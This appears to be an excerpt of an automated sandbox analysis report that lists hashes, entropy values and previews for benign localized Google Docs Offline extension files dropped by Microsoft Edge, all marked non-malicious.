                                                                                                                                                                  Size (bytes):3235
                                                                                                                                                                  Entropy (8bit):3.6081439490236464
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:H3E+6rOEAbeHTln2EQ77Uayg45RjhCSj+OyRdM7AE9qdV:HXcR/nQXUayYV
                                                                                                                                                                  MD5:2D94A58795F7B1E6E43C9656A147AD3C
                                                                                                                                                                  SHA1:E377DB505C6924B6BFC9D73DC7C02610062F674E
                                                                                                                                                                  SHA-256:548DC6C96E31A16CE355DC55C64833B08EF3FBA8BF33149031B4A685959E3AF4
                                                                                                                                                                  SHA-512:F51CC857E4CF2D4545C76A2DCE7D837381CE59016E250319BF8D39718BE79F9F6EE74EA5A56DE0E8759E4E586D93430D51651FC902376D8A5698628E54A0F2D8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):3122
                                                                                                                                                                  Entropy (8bit):3.891443295908904
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:/OOrssRU6Bg7VSdL+zsCfoZiWssriWqo2gx7RRCos2sEeBkS7Zesg:H5GRZlXsGdo
                                                                                                                                                                  MD5:B3699C20A94776A5C2F90AEF6EB0DAD9
                                                                                                                                                                  SHA1:1F9B968B0679A20FA097624C9ABFA2B96C8C0BEA
                                                                                                                                                                  SHA-256:A6118F0A0DE329E07C01F53CD6FB4FED43E54C5F53DB4CD1C7F5B2B4D9FB10E6
                                                                                                                                                                  SHA-512:1E8D15B8BFF1D289434A244172F9ED42B4BB6BCB6372C1F300B01ACEA5A88167E97FEDABA0A7AE3BEB5E24763D1B09046AE8E30745B80E2E2FE785C94DF362F6
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1895
                                                                                                                                                                  Entropy (8bit):4.28990403715536
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:SHYGuEETiuF6OX5tCYFZt5GurMRRevsY4tVZIGnZRxlKT6/U0WG:yYG8iuF6yTCYFH5GjLPtVZVZRxOZ0J
                                                                                                                                                                  MD5:38BE0974108FC1CC30F13D8230EE5C40
                                                                                                                                                                  SHA1:ACF44889DD07DB97D26D534AD5AFA1BC1A827BAD
                                                                                                                                                                  SHA-256:30078EF35A76E02A400F03B3698708A0145D9B57241CC4009E010696895CF3A1
                                                                                                                                                                  SHA-512:7BDB2BADE4680801FC3B33E82C8AA4FAC648F45C795B4BACE4669D6E907A578FF181C093464884C0E00C9762E8DB75586A253D55CD10A7777D281B4BFFAFE302
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1042
                                                                                                                                                                  Entropy (8bit):5.3945675025513955
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:1HAWYsF4dqNfBQH49Hk8YfIhYzTJ+6WJBtl/u4s+6:ZF4wNfvm87mX4LF6
                                                                                                                                                                  MD5:F3E59EEEB007144EA26306C20E04C292
                                                                                                                                                                  SHA1:83E7BDFA1F18F4C7534208493C3FF6B1F2F57D90
                                                                                                                                                                  SHA-256:C52D9B955D229373725A6E713334BBB31EA72EFA9B5CF4FBD76A566417B12CAC
                                                                                                                                                                  SHA-512:7808CB5FF041B002CBD78171EC5A0B4DBA3E017E21F7E8039084C2790F395B839BEE04AD6C942EED47CCB53E90F6DE818A725D1450BF81BA2990154AFD3763AF
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):2535
                                                                                                                                                                  Entropy (8bit):3.8479764584971368
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:YRcHe/4raK1EIlZt1wg62FIOg+xGaF8guI5EP9I2yC:+cs4raK1xlZtOgviOfGaF8RI5EP95b
                                                                                                                                                                  MD5:E20D6C27840B406555E2F5091B118FC5
                                                                                                                                                                  SHA1:0DCECC1A58CEB4936E255A64A2830956BFA6EC14
                                                                                                                                                                  SHA-256:89082FB05229826BC222F5D22C158235F025F0E6DF67FF135A18BD899E13BB8F
                                                                                                                                                                  SHA-512:AD53FC0B153005F47F9F4344DF6C4804049FAC94932D895FD02EEBE75222CFE77EEDD9CD3FDC4C88376D18C5972055B00190507AA896488499D64E884F84F093
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1028
                                                                                                                                                                  Entropy (8bit):4.797571191712988
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:1HAivZZaJ3Rje394+k7IKgpAJjUpSkiQjuRBMd:fZZahBeu7IKgqeMg
                                                                                                                                                                  MD5:970544AB4622701FFDF66DC556847652
                                                                                                                                                                  SHA1:14BEE2B77EE74C5E38EBD1DB09E8D8104CF75317
                                                                                                                                                                  SHA-256:5DFCBD4DFEAEC3ABE973A78277D3BD02CD77AE635D5C8CD1F816446C61808F59
                                                                                                                                                                  SHA-512:CC12D00C10B970189E90D47390EEB142359A8D6F3A9174C2EF3AE0118F09C88AB9B689D9773028834839A7DFAF3AAC6747BC1DCB23794A9F067281E20B8DC6EA
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "SUKURTI NAUJ.".. },.. "explanationofflinedisabled": {.. "message": "Esate neprisijung.. Jei norite naudoti .Google. dokumentus be interneto ry.io, pagrindiniame .Google. dokument. puslapyje eikite . nustatym. skilt. ir .junkite sinchronizavim. neprisijungus, kai kit. kart. b.site prisijung. prie interneto.".. },.. "explanationofflineenabled": {.. "message": "Esate neprisijung., bet vis tiek galite redaguoti pasiekiamus failus arba sukurti nauj..".. },.. "extdesc": {.. "message": "Redaguokite, kurkite ir per.i.r.kite savo dokumentus, skai.iuokles ir pristatymus . visk. darykite be prieigos prie interneto.".. },.. "extname": {.. "message": ".Google. dokumentai neprisijungus".. },.. "learnmore": {.. "message": "Su.inoti daugiau".. },.. "popuphelptext": {.. "message": "Ra.ykite, redaguokite ir bendradarbiaukite bet kurioje vietoje naudodami interneto ry.. arba
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):994
                                                                                                                                                                  Entropy (8bit):4.700308832360794
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:1HAaJ7a/uNpoB/Y4vPnswSPkDzLKFQHpp//BpPDB:7J7a/uzQ/Y4vvswhDzDr/LDB
                                                                                                                                                                  MD5:A568A58817375590007D1B8ABCAEBF82
                                                                                                                                                                  SHA1:B0F51FE6927BB4975FC6EDA7D8A631BF0C1AB597
                                                                                                                                                                  SHA-256:0621DE9161748F45D53052ED8A430962139D7F19074C7FFE7223ECB06B0B87DB
                                                                                                                                                                  SHA-512:FCFBADEC9F73975301AB404DB6B09D31457FAC7CCAD2FA5BE348E1CAD6800F87CB5B56DE50880C55BBADB3C40423351A6B5C2D03F6A327D898E35F517B1C628C
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "IZVEIDOT JAUNU".. },.. "explanationofflinedisabled": {.. "message": "J.s esat bezsaist.. Lai lietotu pakalpojumu Google dokumenti bez interneta savienojuma, n.kamaj. reiz., kad ir izveidots savienojums ar internetu, atveriet Google dokumentu s.kumlapas iestat.jumu izv.lni un iesl.dziet sinhroniz.ciju bezsaist..".. },.. "explanationofflineenabled": {.. "message": "J.s esat bezsaist., ta.u varat redi..t pieejamos failus un izveidot jaunus.".. },.. "extdesc": {.. "message": "Redi..jiet, veidojiet un skatiet savus dokumentus, izkl.jlapas un prezent.cijas, neizmantojot savienojumu ar internetu.".. },.. "extname": {.. "message": "Google dokumenti bezsaist.".. },.. "learnmore": {.. "message": "Uzziniet vair.k".. },.. "popuphelptext": {.. "message": "Rakstiet, redi..jiet un sadarbojieties ar interneta savienojumu vai bez t. neatkar.gi no t., kur atrodaties.".. }..}..
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):2091
                                                                                                                                                                  Entropy (8bit):4.358252286391144
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:1HAnHdGc4LtGxVY6IuVzJkeNL5kP13a67wNcYP8j5PIaSTIjPU4ELFPCWJjMupV/:idGcyYPVtkAUl7wqziBsg9DbpN6XoN/
                                                                                                                                                                  MD5:4717EFE4651F94EFF6ACB6653E868D1A
                                                                                                                                                                  SHA1:B8A7703152767FBE1819808876D09D9CC1C44450
                                                                                                                                                                  SHA-256:22CA9415E294D9C3EC3384B9D08CDAF5164AF73B4E4C251559E09E529C843EA6
                                                                                                                                                                  SHA-512:487EAB4938F6BC47B1D77DD47A5E2A389B94E01D29849E38E96C95CABC7BD98679451F0E22D3FEA25C045558CD69FDDB6C4FEF7C581141F1C53C4AA17578D7F7
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):2778
                                                                                                                                                                  Entropy (8bit):3.595196082412897
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:Y943BFU1LQ4HwQLQ4LQhlmVQL3QUm6H6ZgFIcwn6Rs2ShpQ3IwjGLQSJ/PYoEQj8:I43BCymz8XNcfuQDXYN2sum
                                                                                                                                                                  MD5:83E7A14B7FC60D4C66BF313C8A2BEF0B
                                                                                                                                                                  SHA1:1CCF1D79CDED5D65439266DB58480089CC110B18
                                                                                                                                                                  SHA-256:613D8751F6CC9D3FA319F4B7EA8B2BD3BED37FD077482CA825929DD7C12A69A8
                                                                                                                                                                  SHA-512:3742E24FFC4B5283E6EE496813C1BDC6835630D006E8647D427C3DE8B8E7BF814201ADF9A27BFAB3ABD130B6FEC64EBB102AC0EB8DEDFE7B63D82D3E1233305D
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1719
                                                                                                                                                                  Entropy (8bit):4.287702203591075
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:65/5EKaDMw6pEf4I5+jSksOTJqQyrFO8C:65/5EKaAw6pEf4I5+vsOVqQyFO8C
                                                                                                                                                                  MD5:3B98C4ED8874A160C3789FEAD5553CFA
                                                                                                                                                                  SHA1:5550D0EC548335293D962AAA96B6443DD8ABB9F6
                                                                                                                                                                  SHA-256:ADEB082A9C754DFD5A9D47340A3DDCC19BF9C7EFA6E629A2F1796305F1C9A66F
                                                                                                                                                                  SHA-512:5139B6C6DF9459C7B5CDC08A98348891499408CD75B46519BA3AC29E99AAAFCC5911A1DEE6C3A57E3413DBD0FAE72D7CBC676027248DCE6364377982B5CE4151
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):936
                                                                                                                                                                  Entropy (8bit):4.457879437756106
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:1HARXIqhmemNKsE27rhdfNLChtyo2JJ/YgTgin:iIqFC7lrDfNLCIBRzn
                                                                                                                                                                  MD5:7D273824B1E22426C033FF5D8D7162B7
                                                                                                                                                                  SHA1:EADBE9DBE5519BD60458B3551BDFC36A10049DD1
                                                                                                                                                                  SHA-256:2824CF97513DC3ECC261F378BFD595AE95A5997E9D1C63F5731A58B1F8CD54F9
                                                                                                                                                                  SHA-512:E5B611BBFAB24C9924D1D5E1774925433C65C322769E1F3B116254B1E9C69B6DF1BE7828141EEBBF7524DD179875D40C1D8F29C4FB86D663B8A365C6C60421A7
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "BUAT BAHARU".. },.. "explanationofflinedisabled": {.. "message": "Anda berada di luar talian. Untuk menggunakan Google Docs tanpa sambungan Internet, pergi ke tetapan di halaman utama Google Docs dan hidupkan penyegerakan luar talian apabila anda disambungkan ke Internet selepas ini.".. },.. "explanationofflineenabled": {.. "message": "Anda berada di luar talian, tetapi anda masih boleh mengedit fail yang tersedia atau buat fail baharu.".. },.. "extdesc": {.. "message": "Edit, buat dan lihat dokumen, hamparan dan pembentangan anda . kesemuanya tanpa akses Internet.".. },.. "extname": {.. "message": "Google Docs Luar Talian".. },.. "learnmore": {.. "message": "Ketahui Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit dan bekerjasama di mana-mana sahaja anda berada, dengan atau tanpa sambungan Internet.".. }..}..
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):3830
                                                                                                                                                                  Entropy (8bit):3.5483353063347587
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:Ya+Ivxy6ur1+j3P7Xgr5ELkpeCgygyOxONHO3pj6H57ODyOXOVp6:8Uspsj3P3ty2a66xl09
                                                                                                                                                                  MD5:342335A22F1886B8BC92008597326B24
                                                                                                                                                                  SHA1:2CB04F892E430DCD7705C02BF0A8619354515513
                                                                                                                                                                  SHA-256:243BEFBD6B67A21433DCC97DC1A728896D3A070DC20055EB04D644E1BB955FE7
                                                                                                                                                                  SHA-512:CD344D060E30242E5A4705547E807CE3CE2231EE983BB9A8AD22B3E7598A7EC87399094B04A80245AD51D039370F09D74FE54C0B0738583884A73F0C7E888AD8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1898
                                                                                                                                                                  Entropy (8bit):4.187050294267571
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:1HAmQ6ZSWfAx6fLMr48tE/cAbJtUZJScSIQoAfboFMiQ9pdvz48YgqG:TQ6W6MbkcAltUJxQdfbqQ9pp0gqG
                                                                                                                                                                  MD5:B1083DA5EC718D1F2F093BD3D1FB4F37
                                                                                                                                                                  SHA1:74B6F050D918448396642765DEF1AD5390AB5282
                                                                                                                                                                  SHA-256:E6ED0A023EF31705CCCBAF1E07F2B4B2279059296B5CA973D2070417BA16F790
                                                                                                                                                                  SHA-512:7102B90ABBE2C811E8EE2F1886A73B1298D4F3D5D05F0FFDB57CF78B9A49A25023A290B255BAA4895BB150B388BAFD9F8432650B8C70A1A9A75083FFFCD74F1A
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".... ....... .........".. },.. "explanationofflinedisabled": {.. "message": "..... ...... .......... .... ........ .... .... Google ........ ...... .... ..... ..... ... .......... ....... .... Google ........ .......... ..... .......... .. ...... ..... .... ..... ......... .. ..........".. },.. "explanationofflineenabled": {.. "message": "..... ...... ........., .. ..... ... ... ...... ....... ....... .. .... ....... ....
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):914
                                                                                                                                                                  Entropy (8bit):4.513485418448461
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:1HASvgFARCBxNBv52/fXjOXl6W6ICBxeBvMzU1CSUJAO6SFAIVIbCBhZHdb1tvz+:1HABJx4X6QDwEzlm2uGvYzKU
                                                                                                                                                                  MD5:32DF72F14BE59A9BC9777113A8B21DE6
                                                                                                                                                                  SHA1:2A8D9B9A998453144307DD0B700A76E783062AD0
                                                                                                                                                                  SHA-256:F3FE1FFCB182183B76E1B46C4463168C746A38E461FD25CA91FF2A40846F1D61
                                                                                                                                                                  SHA-512:E0966F5CCA5A8A6D91C58D716E662E892D1C3441DAA5D632E5E843839BB989F620D8AC33ED3EDBAFE18D7306B40CD0C4639E5A4E04DA2C598331DACEC2112AAD
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "NIEUW MAKEN".. },.. "explanationofflinedisabled": {.. "message": "Je bent offline. Wil je Google Documenten zonder internetverbinding gebruiken, ga dan de volgende keer dat je verbinding met internet hebt naar 'Instellingen' op de homepage van Google Documenten en zet 'Offline synchronisatie' aan.".. },.. "explanationofflineenabled": {.. "message": "Je bent offline, maar je kunt nog wel beschikbare bestanden bewerken of nieuwe bestanden maken.".. },.. "extdesc": {.. "message": "Bewerk, maak en bekijk je documenten, spreadsheets en presentaties. Allemaal zonder internettoegang.".. },.. "extname": {.. "message": "Offline Documenten".. },.. "learnmore": {.. "message": "Meer informatie".. },.. "popuphelptext": {.. "message": "Overal schrijven, bewerken en samenwerken, met of zonder internetverbinding.".. }..}..
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):851
                                                                                                                                                                  Entropy (8bit):4.4858053753176526
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                  MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                  SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                  SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                  SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):878
                                                                                                                                                                  Entropy (8bit):4.4541485835627475
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:1HAqwwrJ6wky68uk+NILxRGJwBvDyrj9V:nwwQwky6W+NwswVyT
                                                                                                                                                                  MD5:A1744B0F53CCF889955B95108367F9C8
                                                                                                                                                                  SHA1:6A5A6771DFF13DCB4FD425ED839BA100B7123DE0
                                                                                                                                                                  SHA-256:21CEFF02B45A4BFD60D144879DFA9F427949A027DD49A3EB0E9E345BD0B7C9A8
                                                                                                                                                                  SHA-512:F55E43F14514EECB89F6727A0D3C234149609020A516B193542B5964D2536D192F40CC12D377E70C683C269A1BDCDE1C6A0E634AA84A164775CFFE776536A961
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "OPPRETT NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du er uten nett. For . bruke Google Dokumenter uten internettilkobling, g. til innstillingene p. Google Dokumenter-nettsiden og sl. p. synkronisering uten nett neste gang du er koblet til Internett.".. },.. "explanationofflineenabled": {.. "message": "Du er uten nett, men du kan likevel endre tilgjengelige filer eller opprette nye.".. },.. "extdesc": {.. "message": "Rediger, opprett og se dokumentene, regnearkene og presentasjonene dine . uten nettilgang.".. },.. "extname": {.. "message": "Google Dokumenter uten nett".. },.. "learnmore": {.. "message": "Finn ut mer".. },.. "popuphelptext": {.. "message": "Skriv, rediger eller samarbeid uansett hvor du er, med eller uten internettilkobling.".. }..}..
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):2766
                                                                                                                                                                  Entropy (8bit):3.839730779948262
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:YEH6/o0iZbNCbDMUcipdkNtQjsGKIhO9aBjj/nxt9o5nDAj3:p6wbZbEbvJ8jQkIhO9aBjb/90Ab
                                                                                                                                                                  MD5:97F769F51B83D35C260D1F8CFD7990AF
                                                                                                                                                                  SHA1:0D59A76564B0AEE31D0A074305905472F740CECA
                                                                                                                                                                  SHA-256:BBD37D41B7DE6F93948FA2437A7699D4C30A3C39E736179702F212CB36A3133C
                                                                                                                                                                  SHA-512:D91F5E2D22FC2D7F73C1F1C4AF79DB98FCFD1C7804069AE9B2348CBC729A6D2DFF7FB6F44D152B0BDABA6E0D05DFF54987E8472C081C4D39315CEC2CBC593816
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):978
                                                                                                                                                                  Entropy (8bit):4.879137540019932
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:1HApiJiRelvm3wi8QAYcbm24sK+tFJaSDD:FJMx3whxYcbNp
                                                                                                                                                                  MD5:B8D55E4E3B9619784AECA61BA15C9C0F
                                                                                                                                                                  SHA1:B4A9C9885FBEB78635957296FDDD12579FEFA033
                                                                                                                                                                  SHA-256:E00FF20437599A5C184CA0C79546CB6500171A95E5F24B9B5535E89A89D3EC3D
                                                                                                                                                                  SHA-512:266589116EEE223056391C65808255EDAE10EB6DC5C26655D96F8178A41E283B06360AB8E08AC3857D172023C4F616EF073D0BEA770A3B3DD3EE74F5FFB2296B
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "UTW.RZ NOWY".. },.. "explanationofflinedisabled": {.. "message": "Jeste. offline. Aby korzysta. z Dokument.w Google bez po..czenia internetowego, otw.rz ustawienia na stronie g..wnej Dokument.w Google i w..cz synchronizacj. offline nast.pnym razem, gdy b.dziesz mie. dost.p do internetu.".. },.. "explanationofflineenabled": {.. "message": "Jeste. offline, ale nadal mo.esz edytowa. dost.pne pliki i tworzy. nowe.".. },.. "extdesc": {.. "message": "Edytuj, tw.rz i wy.wietlaj swoje dokumenty, arkusze kalkulacyjne oraz prezentacje bez konieczno.ci ..czenia si. z internetem.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Wi.cej informacji".. },.. "popuphelptext": {.. "message": "Pisz, edytuj i wsp..pracuj, gdziekolwiek jeste. . niezale.nie od tego, czy masz po..czenie z internetem.".. }..}..
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):907
                                                                                                                                                                  Entropy (8bit):4.599411354657937
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:1HASvgU30CBxNd6GwXOK1styCJ02OK9+4KbCBxed6X4LBAt4rXgUCSUuYDHIIQka:1HAcXlyCJ5+Tsz4LY4rXSw/Q+ftkC
                                                                                                                                                                  MD5:608551F7026E6BA8C0CF85D9AC11F8E3
                                                                                                                                                                  SHA1:87B017B2D4DA17E322AF6384F82B57B807628617
                                                                                                                                                                  SHA-256:A73EEA087164620FA2260D3910D3FBE302ED85F454EDB1493A4F287D42FC882F
                                                                                                                                                                  SHA-512:82F52F8591DB3C0469CC16D7CBFDBF9116F6D5B5D2AD02A3D8FA39CE1378C64C0EA80AB8509519027F71A89EB8BBF38A8702D9AD26C8E6E0F499BF7DA18BF747
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Voc. est. off-line. Para usar o Documentos Google sem conex.o com a Internet, na pr.xima vez que se conectar, acesse as configura..es na p.gina inicial do Documentos Google e ative a sincroniza..o off-line.".. },.. "explanationofflineenabled": {.. "message": "Voc. est. off-line, mas mesmo assim pode editar os arquivos dispon.veis ou criar novos arquivos.".. },.. "extdesc": {.. "message": "Edite, crie e veja seus documentos, planilhas e apresenta..es sem precisar de acesso . Internet.".. },.. "extname": {.. "message": "Documentos Google off-line".. },.. "learnmore": {.. "message": "Saiba mais".. },.. "popuphelptext": {.. "message": "Escreva, edite e colabore onde voc. estiver, com ou sem conex.o com a Internet.".. }..}..
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):914
                                                                                                                                                                  Entropy (8bit):4.604761241355716
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est. offline. Para utilizar o Google Docs sem uma liga..o . Internet, aceda .s defini..es na p.gina inicial do Google Docs e ative a sincroniza..o offline da pr.xima vez que estiver ligado . Internet.".. },.. "explanationofflineenabled": {.. "message": "Est. offline, mas continua a poder editar os ficheiros dispon.veis ou criar novos ficheiros.".. },.. "extdesc": {.. "message": "Edite, crie e veja os documentos, as folhas de c.lculo e as apresenta..es, tudo sem precisar de aceder . Internet.".. },.. "extname": {.. "message": "Google Docs offline".. },.. "learnmore": {.. "message": "Saber mais".. },.. "popuphelptext": {.. "message": "Escreva edite e colabore onde quer que esteja, com ou sem uma liga..o . Internet.".. }..}..
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):937
                                                                                                                                                                  Entropy (8bit):4.686555713975264
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREEAZ. UN DOCUMENT".. },.. "explanationofflinedisabled": {.. "message": "E.ti offline. Pentru a utiliza Documente Google f.r. conexiune la internet, intr. .n set.rile din pagina principal. Documente Google .i activeaz. sincronizarea offline data viitoare c.nd e.ti conectat(.) la internet.".. },.. "explanationofflineenabled": {.. "message": "E.ti offline, dar po.i .nc. s. editezi fi.ierele disponibile sau s. creezi altele.".. },.. "extdesc": {.. "message": "Editeaz., creeaz. .i acceseaz. documente, foi de calcul .i prezent.ri - totul f.r. acces la internet.".. },.. "extname": {.. "message": "Documente Google Offline".. },.. "learnmore": {.. "message": "Afl. mai multe".. },.. "popuphelptext": {.. "message": "Scrie, editeaz. .i colaboreaz. oriunde ai fi, cu sau f.r. conexiune la internet.".. }..}..
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1337
                                                                                                                                                                  Entropy (8bit):4.69531415794894
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".......".. },.. "explanationofflinedisabled": {.. "message": "..... ............ Google ......... ... ........., ............ . .... . ......... ............. . ......-...... . .......... .. ......... .........".. },.. "explanationofflineenabled": {.. "message": "... ........... . .......... .. ...... ......... ..... ..... . ............. .., . ....... ........ ......-.......".. },.. "extdesc": {.. "message": ".........., .............. . ............ ........., ....... . ........... ... ....... . ..........".. },.. "extname": {.. "message": "Google.......... ......".. },.. "learnmore": {.
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):2846
                                                                                                                                                                  Entropy (8bit):3.7416822879702547
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  Malicious:false
